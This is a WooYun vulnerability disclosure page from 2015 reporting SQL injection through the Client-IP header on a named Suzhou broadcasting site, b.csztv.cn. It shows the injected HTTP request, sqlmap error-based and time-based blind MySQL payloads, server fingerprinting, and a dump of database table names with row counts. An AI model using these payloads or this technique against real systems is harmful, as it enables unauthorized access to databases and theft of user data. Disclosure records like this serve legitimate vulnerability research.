当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159639

漏洞标题:苏州广电网某站Client-IP存在SQL注入漏洞

相关厂商:csztv.cn

漏洞作者: 深度安全实验室

提交时间:2015-12-09 15:17

修复时间:2015-12-14 15:18

公开时间:2015-12-14 15:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-09: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

GET /px/pollOk/21 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: *
Cookie: ci_session=0PTBypVyreZMiVM%2BSl1EqGS5VxaVrY2YuuUQNlnd9Gia8PNb7LCZE%2BKA9HZi4I48DGa0xcMc5HSK%2BAQhUf3022rwCzRQGMv1L2%2BPuzNaD6mUJLOJznkRGD4RTcXkhulRt1oCUqhhuEAx39N8w3g%2BNm3plwQ2AAZJs%2BUGLbQY8wcn49RgXINMzT3DuruRfhAkqXrrd%2F8w%2B0%2B%2BlApy2WIy5wv55PoY39r6RM1oCQg0Xi2NFiUwynb5c3FxL5YPyrVih3Id%2FgTAEKyKF3B9X0vng%2FZDWQ7QuUzptSBLRidWrZDcRD1R1y09Fr00%2Fh%2BbwnLyIJqCZlmiQAEE4QY7AskI0g%3D%3D
Host: b.csztv.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

111.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Client-IP #1* ((custom) HEADER)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: ' AND (SELECT 9211 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (ELT(9211=9211,1))),0x716a787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'FWRl'='FWRl
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ' AND (SELECT * FROM (SELECT(SLEEP(5)))WjIN) AND 'caKC'='caKC
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0
Database: bang
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| bang_poll_info       | 1962678 |
| bang_user_action     | 289342  |
| bang_smsinfo_back    | 210640  |
| bang_hostip          | 144757  |
| bang_capta           | 121454  |
| test_test            | 69865   |
| att_log_his          | 56622   |
| bang_user            | 47830   |
| bang_sessions        | 38756   |
| bang_page_result     | 30360   |
| att_usertask         | 26403   |
| att_task             | 26361   |
| bang_poll_infot      | 18876   |
| wy_vote              | 16897   |
| wy_capta             | 16492   |
| att_daka_his         | 12639   |
| bang_phone           | 7299    |
| bang_page_option     | 6362    |
| att_daka_detail_his  | 5782    |
| bang_phone_tamp      | 5145    |
| bang_option_his      | 4804    |
| bang_rank_news       | 3432    |
| bang_page_option_bak | 3357    |
| bang_page_option_old | 3037    |
| bang_news            | 1347    |
| bang_page_title      | 1156    |
| bang_candidate       | 918     |
| intorder             | 405     |
| bang_tjinfo          | 309     |
| qauserinfo           | 279     |
| host_news            | 237     |
| host13_news          | 186     |
| bang_sign            | 182     |
| bang_survey          | 154     |
| contable             | 135     |
| torder               | 135     |
| adcenter             | 126     |
| trade                | 89      |
| bang_poster          | 77      |
| att_leave            | 39      |
| bang_poll            | 34      |
| att_members          | 17      |
| bang_changelog       | 10      |
| class                | 8       |
| yd_members           | 8       |
| poster               | 7       |
| range                | 7       |
| bang_rank_trade      | 6       |
| bang_tjtype          | 6       |
| host_image           | 6       |
| bang_action_prize    | 5       |
| att_train            | 2       |
| bang_event           | 2       |
| userinfo             | 2       |
| att_train_user       | 1       |
| wy_action            | 1       |
+----------------------+---------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-14 15:18

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无